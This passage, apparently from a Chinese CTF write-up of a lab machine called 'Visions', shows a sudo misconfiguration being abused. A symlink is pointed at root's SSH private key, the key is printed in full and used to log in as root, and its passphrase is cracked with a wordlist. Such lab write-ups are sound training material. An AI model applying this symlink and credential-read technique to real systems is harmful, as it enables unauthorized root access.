\u7136\u540e\u5c1d\u8bd5\u5220\u9664\u539f\u6765\u7684\u76ee\u5f55\u6dfb\u52a0\u52a8\u6001\u94fe\u63a5\u5230root\u7684\u5bc6\u94a5\uff0c\u518d\u5207\u6362\u56de\u53bb\u8bfb\u53d6flag\uff01\uff01\uff01<\/p>\n
isabella@visions:~$ sudo -l\nMatching Defaults entries for isabella on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser isabella may run the following commands on visions:\n (emma) NOPASSWD: \/usr\/bin\/man\nisabella@visions:~$ ls -la\ntotal 28\ndrwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 isabella isabella 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 isabella isabella 3526 Apr 19 2021 .bashrc\n-rw------- 1 isabella isabella 1876 Apr 19 2021 .invisible\n-rw-r--r-- 1 isabella isabella 807 Apr 19 2021 .profile\ndrwx------ 2 isabella isabella 4096 Apr 19 2021 .ssh\nisabella@visions:~$ rm -rf .\/.invisible\nisabella@visions:~$ ln -s \/root\/.ssh\/id_rsa .\/.invisible\nisabella@visions:~$ su sophia\nPassword: \nsophia@visions:\/home\/isabella$ sudo -l\nMatching Defaults entries for sophia on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sophia may run the following commands on visions:\n (ALL : ALL) NOPASSWD: \/usr\/bin\/cat \/home\/isabella\/.invisible\nsophia@visions:\/home\/isabella$ sudo -u root \/usr\/bin\/cat \/home\/isabella\/.invisible\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAyezVs6KCQ\/KFWpEkzDWX3ns\/X4lUnh6PnNC2IVg3ciVgLcWF\/\/wb\nvlQxI+juYu5qTKVEL1FhkNaas+MlQUxabzOv+SDnCck60BLQbZf46sYHQaTrDyu5zhIWWi\nwgPjmic\/Ykd2qIQyIpyy9Ru4DiVK4RWLZWM28kb6eB99JTt4GSVEhraJ08hKsgaOi+skNg\nS4QG85kG4ghmA1yJpPwzzpIdG4HUic63OXgy+z+pVB5oIEp0YXrCKMN\/lBngZjZb9\/+0S1\nljKzdcq7m1TOQ1Y04YJNMrxvPJ75d8U5s+m6cRxx5F3dX7oTVmErEAxFmJjdWVChzh81Ca\nOnicNjHgrQAAA8hmM8ISZjPCEgAAAAdzc2gtcnNhAAABAQDJ7NWzooJD8oVakSTMNZfeez\n9fiVSeHo+c0LYhWDdyJWAtxYX\/\/Bu+VDEj6O5i7mpMpUQvUWGQ1pqz4yVBTFpvM6\/5IOcJ\nyTrQEtBtl\/jqxgdBpOsPK7nOEhZaLCA+OaJz9iR3aohDIinLL1G7gOJUrhFYtlYzbyRvp4\nH30lO3gZJUSGtonTyEqyBo6L6yQ2BLhAbzmQbiCGYDXImk\/DPOkh0bgdSJzrc5eDL7P6lU\nHmggSnRhesIow3+UGeBmNlv3\/7RLWWMrN1yrubVM5DVjThgk0yvG88nvl3xTmz6bpxHHHk\nXd1fuhNWYSsQDEWYmN1ZUKHOHzUJo6eJw2MeCtAAAAAwEAAQAAAQEAiCmVXYHLN8h1VkIj\nvzSwiU0wydqQXeOb0hIHjuqu0OEVPyhAGQNHLgwV6vIqtjmxIqgbF5FYKlQclAsq1yKGpR\nAErQkb4sR4TVEyjYR6TM5mnER6YYuJysT1n667u1ogCvRDWOdUpXiHGEV7ZuYdOR78AYdL\nD3n15vjcsmF5JHcftHOxnXraX7JqGXNCoRsMLT\/yUOl02ClHsjFql1NTI\/Br0GA4xhM\/16\nRHoRu1itOlWoyF4XSpSUDHW0RVQ\/0gm\/GyAc9QF6EWZXHfMfW07JvkeQLlndVbnItQ9a3v\nICAAh6zOZWVXpbhCPjjfaWTnwHhhSE3vfxMQQNTJnEghnQAAAIEAjAEzb6Xp6VV1RRaJR3\n\/Gxo0BRIbPJXdRXpDI3NO4Nvtzv8fX3muV\/i+dgYPNqa7cwheSJZX9S7RzXsZTZn1Ywbdw\nahYTVyE9B4Nsen5gekylb59tNwPpCR8sJo6ZIL1GpmkEug+r+0YZyqpZXpG5uhCaSLX1fP\n3UnkgqiKuzpvQAAACBAOOlQPW6pWXvULDsiUkilMXY0SNYLupMHJuqnWTuufyNfRthPQF2\ngfWwXRjfDmzFoM9vVxJKKSd40696qbmTNnu7I4KyvXkF0OQ3IXIelQIiIcDpDbYd17g47J\nIC6dHIQmUib3+whjeTvA5cc21y0EGNHoeNrlknE03dZHaIyfdPAAAAgQDjE3TE17PMEnd\/\nvzau9bBYZaoRt+eYmvXFrkU\/UdRwqjS\/LPWxwmpLOASW9x3bH\/aiqNGBKeSe2k4C7MWWD5\ntllkIbNEJNDtqQNt2NRvhDUOzAxca1C\/IySuwoCAvoym5cpZ\/\/EQ\/OvWyZRwk3enReVmmd\nx7Itf3P39SxqlP2pQwAAAAxyb290QHZpc2lvbnMBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
sophia@visions:\/home\/isabella$ exit\nexit\nisabella@visions:~$ exit\nlogout\nConnection to 192.168.0.168 closed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ vim root \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ chmod 600 root \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ ssh root@192.168.0.168 -i root \nLinux visions 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 19 05:24:08 2021\nroot@visions:~# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Apr 19 2021 .\ndrwxr-xr-x 18 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\n-rwx--x--x 1 root root 1920 Apr 19 2021 flag.sh\ndrwxr-xr-x 3 root root 4096 Apr 19 2021 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 15 Apr 19 2021 root.txt\ndrwx------ 2 root root 4096 Apr 19 2021 .ssh\nroot@visions:~# cat root.txt \nhmvitspossible\nroot@visions:~# cat flag.sh \n#!\/bin\/bash\necho '\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m' \n\necho "-------------------------"\necho "\\nPWNED HOST: $(hostname)"\necho "\\nPWNED DATE: $(date)"\necho "\\nWHOAMI: $(id)"\necho "\\nFLAG: $(cat root.txt 2>\/dev\/null || cat user.txt 2>\/dev\/null || echo "Keep trying.")"\necho "\\n------------------------"<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\n
\u53e6\u4e00\u4e2a\u5de5\u5177\u53ef\u4ee5\u7834\u89e3id_rsa<\/code>\u7684\u5bc6\u7801<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ rsacrack -w \/usr\/share\/wordlists\/rockyou.txt -k id_rsa\n\n\u256d\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u256e \u256d\u256e \n\u2503\u256d\u2501\u256e\u2503\u256d\u2501\u256e\u2503\u256d\u2501\u256e\u2503 \u2503\u2503 \n\u2503\u2570\u2501\u256f\u2503\u2570\u2501\u2501\u252b\u2503 \u2503\u2523\u2501\u2501\u2533\u2501\u2533\u2501\u2501\u2533\u2501\u2501\u252b\u2503\u256d\u256e\n\u2503\u256d\u256e\u256d\u253b\u2501\u2501\u256e\u2503\u2570\u2501\u256f\u2503\u256d\u2501\u252b\u256d\u252b\u256d\u256e\u2503\u256d\u2501\u252b\u2570\u256f\u256f\n\u2503\u2503\u2503\u2570\u252b\u2570\u2501\u256f\u2503\u256d\u2501\u256e\u2503\u2570\u2501\u252b\u2503\u2503\u256d\u256e\u2503\u2570\u2501\u252b\u256d\u256e\u256e\n\u2570\u256f\u2570\u2501\u253b\u2501\u2501\u2501\u253b\u256f \u2570\u253b\u2501\u2501\u253b\u256f\u2570\u256f\u2570\u253b\u2501\u2501\u253b\u256f\u2570\u256f\n-=========================-\n[*] Cracking: id_rsa\n[*] Wordlist: \/usr\/share\/wordlists\/rockyou.txt\n[i] Status:\n 11274\/14344392\/0%\/invisible\n[+] Password: invisible Line: 11274<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Visions \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions] \u2514\u2500$ r […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-625","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=625"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions"}],"predecessor-version":[{"id":626,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions\/626"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=625"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240424150757671\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737434.png\")
<\/div><\/p>\n![\"image-20240424150952038\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737435.png\")
<\/div><\/p>\n![\"image-20240424152557695\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737436.png\")
<\/div><\/p>\n![\"image-20240424152712929\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737437.png\")
<\/div><\/p>\n![\"image-20240424153606823\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737438.png\")
<\/div><\/p>\n